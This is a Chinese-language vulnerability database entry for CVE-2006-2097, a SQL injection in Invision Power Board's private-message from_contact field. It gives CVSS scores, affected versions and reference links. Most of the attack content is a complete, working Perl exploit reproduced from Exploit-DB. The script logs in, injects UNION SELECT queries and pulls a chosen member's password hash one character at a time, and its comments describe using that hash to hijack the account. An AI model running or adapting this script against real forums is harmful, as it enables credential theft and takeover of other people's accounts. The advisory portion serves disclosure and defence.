CVE-2006-2097
CVSS7.5
发布时间 :2006-04-29 06:02:00
修订时间 :2008-09-05 17:03:39
NMCOE    

[原文]SQL injection vulnerability in func_msg.php in Invision Power Board (IPB) 2.1.4 allows remote attackers to execute arbitrary SQL commands via the from_contact field in a private message (PM).


[CNNVD]Invision Power Board func_msg.php远程SQL注入漏洞(CNNVD-200604-565)

        Invision Power Board是一款流行的PHP论坛程序。
        Invision Power Board的func_msg.php第448行存在SQL注入漏洞。to_by_id没有经过正确的过滤便通过messenger类实例从ipd过滤的输入数组传送给了类,因此攻击者可以操控SQL查询,执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:invision_power_services:invision_power_board:1.3.1_final
cpe:/a:invision_power_services:invision_power_board:1.0.1
cpe:/a:invision_power_services:invision_power_board:2.0.3
cpe:/a:invision_power_services:invision_power_board:1.3
cpe:/a:invision_power_services:invision_power_board:1.1.1
cpe:/a:invision_power_services:invision_power_board:2.1_beta3
cpe:/a:invision_power_services:invision_power_board:2.1_rc1
cpe:/a:invision_power_services:invision_power_board:1.1.2
cpe:/a:invision_power_services:invision_power_board:2.0.4
cpe:/a:invision_power_services:invision_power_board:2.0.0
cpe:/a:invision_power_services:invision_power_board:2.1.2
cpe:/a:invision_power_services:invision_power_board:2.1.4
cpe:/a:invision_power_services:invision_power_board:2.1_beta4
cpe:/a:invision_power_services:invision_power_board:1.0
cpe:/a:invision_power_services:invision_power_board:2.1.1
cpe:/a:invision_power_services:invision_power_board:2.1.0
cpe:/a:invision_power_services:invision_power_board:2.0.1
cpe:/a:invision_power_services:invision_power_board:2.1_beta5
cpe:/a:invision_power_services:invision_power_board:1.3_final
cpe:/a:invision_power_services:invision_power_board:2.1
cpe:/a:invision_power_services:invision_power_board:1.2
cpe:/a:invision_power_services:invision_power_board:2.1.3
cpe:/a:invision_power_services:invision_power_board:2.0.2
cpe:/a:invision_power_services:invision_power_board:2.1_beta2
cpe:/a:invision_power_services:invision_power_board:2.0.x
cpe:/a:invision_power_services:invision_power_board:2.1_alpha2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2097
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2097
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-565
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17719
(UNKNOWN)  BID  17719
http://www.securityfocus.com/archive/1/archive/1/432248/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060427 SQL injection exploit IPB <= 2.1.4
http://xforce.iss.net/xforce/xfdb/26107
(UNKNOWN)  XF  invision-fromcontact-sql-injection(26107)
http://www.osvdb.org/25021
(UNKNOWN)  OSVDB  25021
http://securityreason.com/securityalert/813
(UNKNOWN)  SREASON  813
http://secunia.com/advisories/19861
(UNKNOWN)  SECUNIA  19861

- 漏洞信息

Invision Power Board func_msg.php远程SQL注入漏洞
高危 SQL注入
2006-04-29 00:00:00 2006-05-01 00:00:00
远程  
        Invision Power Board是一款流行的PHP论坛程序。
        Invision Power Board的func_msg.php第448行存在SQL注入漏洞。to_by_id没有经过正确的过滤便通过messenger类实例从ipd过滤的输入数组传送给了类,因此攻击者可以操控SQL查询,执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.invisionboard.com/

- 漏洞信息 (1733)

Invision Power Board <= 2.1.5 (from_contact) SQL Injection Exploit (EDBID:1733)
php webapps
2006-05-01 Verified
0 Ykstortion Security
N/A [点击下载]
#!/usr/bin/perl
#############################################################################
## IPB <=2.1.4 exploit (possibly 2.1.5 too)                                ##
## Brought to you by the Ykstortion security team.                         ##
##                                                                         ##
## The bug is in the pm system so you must have a registered user.         ##
## The exploit will extract a password hash from the forum's data base of  ##
## the target user.                                                        ##
## You need to know the target user's member ID but it's not difficult to  ##
## find out, just look under their avatar next to one of their posts.      ##
## Once you have the hash, simply unset all forum cookies and set          ##
## member_id to the target user's member id and pass_hash to the hash      ##
## obtained from the database by this script.                              ##
##                                                                         ##
## Usage:                                                                  ##
##   $ ./ipb                                                               ##
##   IPB Forum URL ? forums.example.com/forums                             ##
##   Your username ? krypt_sk1dd13                                         ##
##   Your pass ? if_your_on_nix_this_gets_hidden                           ##
##   Target userid ? 3637                                                  ##
##                                                                         ##
##   Attempting to extract password hash from database...                  ##
##   537ab2d5b37ac3a3632f5d06e8e04368                                      ##
##   Hit enter to quit.                                                    ##
##                                                                         ##
## Requirements:                                                           ##
##   o Perl 5                                                              ##
##   o LWP 5.64 or later                                                   ##
##   o Internet access                                                     ##
##   o A forum you hate/dislike                                            ##
##   o A user on said forum                                                ##
##   o 32+ PMs left till your inbox is full, if not you can still delete   ##
##     PMs from your inbox as the successful ones come through             ##
##                                                                         ##
## Credit to: Nuticulus for finding the SQL injection                      ##
##                                                                         ##
## Have fun, you dumb skiddie.                                             ##
#############################################################################

use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;

# variables
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;
my @charset = ('0' .. '9', 'a' .. 'f');
my %form = (act		=> 'Msg',
	CODE		=> '04',
	MODE		=> '01',
	OID		=> '',
	removeattachid	=> '',
	msg_title	=> 'asdf',
	bbmode		=> 'normal',
	ffont		=> 0,
	fsize		=> 0,
	fcolor		=> 0,
	LIST		=> ' LIST ',
	helpbox		=> 'Insert Monotype Text (alt + p)',
	tagcount	=> 0,
	Post		=> 'jkl');
	

# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;

# init the cookie jar
$ua->cookie_jar ($cj);

# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";

# get user input
print 'IPB Forum URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;		# to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;		# to turn it back on
print "\n" if $stty;
print 'Target userid ? ';	# it'll say next to one of their posts
chomp (my $tid = <STDIN>);

# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }

do {
	$resp = $ua->post ($base_url . $login_page,
		[ UserName => $user,
		  PassWord => $pass,
		  CookieDate => 1,
		]);
} while ($tries-- && !$resp->is_success());

# reset tries
$tries = 5;

# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }

# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
	die "Error: password incorrect.\n";
}

# get ourselves a post_key (and an auth_key too with newer versions)
do {
	$resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());

# reset tries
$tries = 5;

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)
{
	$form{post_key} = $1;
} else {
	die "Error: couldn't get a post key.\n";
}
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)
{
	$form{auth_key} = $1;
}

# turn off buffering so chars in the hash show up straight away
$| = 1;

print "\nAttempting to extract password hash from database...\n ";

OFFSET:
for ($i = 0; $i < 32; ++$i) {
	CHAR:
	for ($j = 0; $j < @charset; ++$j) {
		# reset tries
		$tries = 5;
		print "\x08", $charset[$j];
		# build sql injection
		$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
		     . (join (',', map {ord} split ('', $user))) . ') FROM '
		     . 'ibf_members WHERE id = ' . $tid . ' AND MID('
		     . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
		     . ord ($charset[$j]) . ')';
		$form{from_contact} = $sql;
		$resp = $ua->post ($base_url . $post_pm_page, \%form,
			referer => $base_url . $pm_page);
		if (!$resp->is_success()) {
			die "\nError: " . $resp->status_line
			  . "\n" if (!$tries);
			--$tries;
			redo;
		}
		if ($resp->content =~ /sql error/i) {
			if ($need_null) {
				die "Error: SQL error.\n";
			} else {
				$need_null = 1;
				redo OFFSET;
			}
		} elsif ($resp->content !~ /there is no such member/i) {
			# we have a winner !
			print ' ';
			next OFFSET;
		}
	}
	# uh oh, something went wrong
	die "\nError: couldn't get a char for offset $i\n";
}
print "\x08 \x08\nHit enter to quit.\n";
<STDIN>;

# milw0rm.com [2006-05-01]
		

- 漏洞信息

25021
Invision Power Board Cookie from_contact Field SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Invision Power Board contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to an unknown or unspecified script not properly sanitizing user-supplied input to the 'from_contact' variable when posting a message to another user. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-04-27 Unknow
2006-04-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站